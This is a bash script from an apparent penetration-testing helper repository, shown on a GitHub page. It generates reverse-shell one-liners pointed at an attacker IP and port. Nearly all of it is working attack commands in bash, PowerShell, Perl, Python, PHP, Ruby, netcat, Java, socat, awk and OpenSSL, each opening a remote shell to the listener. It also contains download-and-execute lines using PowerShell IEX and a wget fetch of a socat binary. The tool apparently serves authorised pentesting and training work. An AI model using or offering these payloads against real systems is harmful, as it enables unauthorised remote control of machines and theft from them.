-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathreverse-shells
157 lines (124 loc) · 9.34 KB
/
reverse-shells
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
#!/bin/bash
# To be displayed when the -h flag is issued
function usage {
echo ""
echo -e "This script generates a number of reverse shell one-liners(not dynamic). By default, the ip address from tun0 is used if set.\nUsing the ${BWhite}'set-target-ip'${RESET} and ${BWhite}'show-target-ip'${RESET} scripts from https://github.com/soutzis/Penetration-Testing-Helper-Scripts is recommended."
echo -e "\n${BGreen}usage${Green}: $0 [OPTIONS]"
echo -e "\n[OPTIONS]\n\t-ip\tThe IP address of the server/listener (attacker)\n\t-port\tThe port of the server/listener\n\t-vic\tThe IP address of the client (victim)\n\t-h\tDisplay this help menu${RESET}"
echo -e "\nExample: reverse-shells -ip=192.168.10.10 -port=4444"
echo -e "Example: reverse-shells -port 4444"
}
# MAIN
RESET="\033[0m"
Green="\033[0;32m"
Yellow='\033[0;33m'
Red='\033[0;31m'
Purple='\033[0;35m'
BGreen='\033[1;32m' # Bold Green
BYellow='\033[1;33m' # Bold Yellow
BRed='\033[1;31m' # Bold Red
BWhite='\033[1;37m'
#while getopts ":h" flag
# do
# case "${flag}" in
# h) usage; exit 0;;
# esac
# done
TEMP=$(getopt -n "$0" -a -l "ip:,port:,vic:,h" -- -- "$@")
[ $? -eq 0 ] || exit
eval set -- "$TEMP"
while [ $# -gt 0 ]
do
case "$1" in
--ip) IP="$2"; shift;;
--port) PORT="$2"; shift;;
--vic) VIC="$2"; shift;;
--h) usage; exit 0;;
--) shift;;
esac
shift;
done
# Set LHOST, LPORT and RHOST values before printing one-liners
# ip
if [[ -z ${IP} ]]; then
LHOST=$(ifconfig | grep -A1 tun0 | grep inet | awk '{print $2}') # Get current VPN IP if tun0 is set
if [[ -z ${LHOST} ]]; then
LHOST=${BRed}'IP'${Yellow}
else
LHOST=${BYellow}${LHOST}${Yellow}
fi
else
LHOST=${BYellow}${IP}${Yellow}
fi
# port
if [[ -z ${PORT} ]]; then
LPORT=${BYellow}'443'${Yellow}
else
LPORT=${BYellow}${PORT}${Yellow}
fi
# victim
if [[ -z ${VIC} ]]; then
RHOST=$(show-target-ip || :)
if [ -z $RHOST ]; then
RHOST=${BRed}'TARGET-IP'${Yellow}
fi
else
RHOST=${VIC}
fi
## help
#if [[ -z ${H} ]]; then
# :
#else
# usage
#fi
echo "-> More reverse shells: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#revshells"
echo -e "\nPossible shells on target: ${Purple}sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash${RESET}"
echo -e "\n${BGreen}MSFVENOM${RESET}"
echo -e "${Yellow}msfvenom -l payloads | grep \"cmd/unix\" | awk '{print \$1}'${RESET} -> Shows available UNIX one-liners"
echo -e "${Yellow}msfvenom -l payloads | grep \"cmd/windows\" | awk '{print \$1}'${RESET} -> Shows available WINDOWS one-liners"
echo -e "${Yellow}msfvenom -p cmd/unix/reverse_netcat LHOST=${LHOST} LPORT=${LPORT} R${RESET} -> Example of netcat reverse shell"
echo -e "\n${BGreen}BASH${RESET}"
echo -e "${Yellow}bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1${RESET}"
echo -e "${Yellow}bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1${RESET} -> UDP client, ${Yellow}nc -u -lvp ${LPORT}${RESET} -> UDP Listener"
echo -e "${Yellow}exec 5<> /dev/tcp/${LHOST}/${LPORT} && cat <&5 | while read line; do $line 2>&5 >&5; done${RESET}"
echo -e "${Yellow}0<&196;exec 196<>/dev/tcp/${LHOST}/${LPORT}; sh <&196 >&196 2>&196${RESET}"
echo -e "${Yellow}/bin/bash -l > /dev/tcp/${LHOST}/${LPORT} 0<&1 2>&1${RESET}"
echo -e "\n${BGreen}POWERSHELL${RESET}"
echo -e "${Yellow}powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"${LHOST}\",${LPORT});\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + \"PS \" + (pwd).Path + \"> \";\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()${RESET}"
echo -e "\n${Yellow}powershell -nop -c \"\$client = New-Object System.Net.Sockets.TCPClient('${LHOST}',${LPORT});\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\"${RESET}"
echo -e "\n${Yellow}powershell IEX (New-Object Net.WebClient).DownloadString('${LHOST}/path_to_.ps1')${RESET} -> https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1"
echo -e "\n${BGreen}PERL${RESET}"
echo -e "${Yellow}perl -e 'use Socket;\$i=\"${LHOST}\";\$p=${LPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'${RESET}"
echo -e "\n${Yellow}perl -MIO -e '\$p=fork;exit,if(\$p);\$c=new IO::Socket::INET(PeerAddr,\"${LHOST}:${LPORT}\");STDIN->fdopen(\$c,r);\$~->fdopen(\$c,w);system\$_ while<>;'${RESET}"
echo -e "\n${Yellow}perl -MIO -e '\$c=new IO::Socket::INET(PeerAddr,\"${LHOST}:${LPORT}\");STDIN->fdopen(\$c,r);\$~->fdopen(\$c,w);system\$_ while<>;'${RESET} -> Windows only"
echo -e "\n${BGreen}PYTHON${RESET}"
echo -e "${Yellow}python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"${LHOST}\",${LPORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'${RESET} -> Python 2.7"
echo -e "\n${Yellow}export RHOST=\"${LHOST}\";export RPORT=${LPORT};python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'${RESET} -> Linux only"
echo -e "\n${Yellow}python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"${LHOST}\",${LPORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'${RESET} -> Linux only"
echo -e "\n${BGreen}PHP${RESET}"
echo -e "${Yellow}php -r '\$sock=fsockopen(\"${LHOST}\",${LPORT});exec(\"/bin/sh -i <&3 >&3 2>&3\");'${RESET}"
echo -e "${Yellow}php -r '\$sock=fsockopen(\"${LHOST}\",${LPORT});passthru(\"/bin/sh -i <&3 >&3 2>&3\");'${RESET}"
echo -e "\n${BGreen}RUBY${RESET}"
echo -e "${Yellow}ruby -rsocket -e'f=TCPSocket.open(\"${LHOST}\",${LPORT}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'${RESET}"
echo -e "\n${BGreen}NETCAT${RESET}"
echo -e "${Yellow}nc -e /bin/sh ${LHOST} ${LPORT}${RESET}"
echo -e "${Yellow}rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ${LHOST} ${LPORT} >/tmp/f${RESET}"
echo -e "\n${BGreen}JAVA${RESET}"
echo -e "${Yellow}r = Runtime.getRuntime(); p = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/${LHOST}/${LPORT};cat <&5 | while read line; do \$line 2>&5 >&5; done\"] as String[]); p.waitFor();${RESET}"
echo -e "\n${BGreen}XTERM${RESET}"
echo -e "${Yellow}xterm -display ${LHOST}:${BYellow}1${RESET} -> Target/Client (port is 6001)"
echo -e "${Yellow}xhost +${RHOST}${RESET} -> Authorise Client to connect (run on Server's host)"
echo -e "${Yellow}Xnest :${BYellow}1${RESET} -> Listener/Server (port is 6001)"
echo -e "\n${BGreen}SOCAT${RESET}"
echo -e "${Yellow}socat file:\`tty\`,raw,echo=0 TCP-L:${LPORT}${RESET} -> Listener/Server"
echo -e "${Yellow}/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:${LHOST}:${LPORT}${RESET} -> Victim/Client"
echo -e "${Yellow}wget -q ${LHOST}/<path_to_socat_binary> -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:${LHOST}${Yellow}:${LPORT}${RESET} -> one-liner"
echo -e "\n${BGreen}AWK${RESET}"
echo -e "${Yellow}awk 'BEGIN {s = \"/inet/tcp/0/${LHOST}/${LPORT}\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null${RESET}"
echo -e "\n${BGreen}OPENSSL${RESET}"
echo -e "${Yellow}openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes${RESET} -> Generate keys for server"
echo -e "${Yellow}openssl s_server -quiet -key key.pem -cert cert.pem -port ${LPORT}${RESET} OR ${Yellow}ncat --ssl -vv -l -p ${LPORT}${RESET} -> Run the server"
echo -e "${Yellow}mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ${LHOST}:${LPORT} > /tmp/s; rm /tmp/s${RESET} -> Client"
echo -e "\n${Yellow}openssl rand -hex 48${RESET} -> Generate PSK"
echo -e "${Yellow}export LHOST=\"*\"; export LPORT=\"${LPORT}\"; export PSK=\"${Bred}PSK${Yellow}\"; openssl s_server -quiet -tls1_2 -cipher PSK-CHACHA20-POLY1305:PSK-AES256-GCM-SHA384:PSK-AES256-CBC-SHA384:PSK-AES128-GCM-SHA256:PSK-AES128-CBC-SHA256 -psk \$PSK -nocert -accept \$LHOST:\$LPORT${RESET} -> Run the server"
echo -e "${Yellow}export RHOST=\"${LHOST}\"; export RPORT=\"${LPORT}\"; export PSK=\"${Bred}PSK${Yellow}\"; export PIPE=\"/tmp/\`openssl rand -hex 4\`\"; mkfifo \$PIPE; /bin/sh -i < \$PIPE 2>&1 | openssl s_client -quiet -tls1_2 -psk \$PSK -connect \$RHOST:\$RPORT > \$PIPE; rm \$PIPE${RESET} -> Client"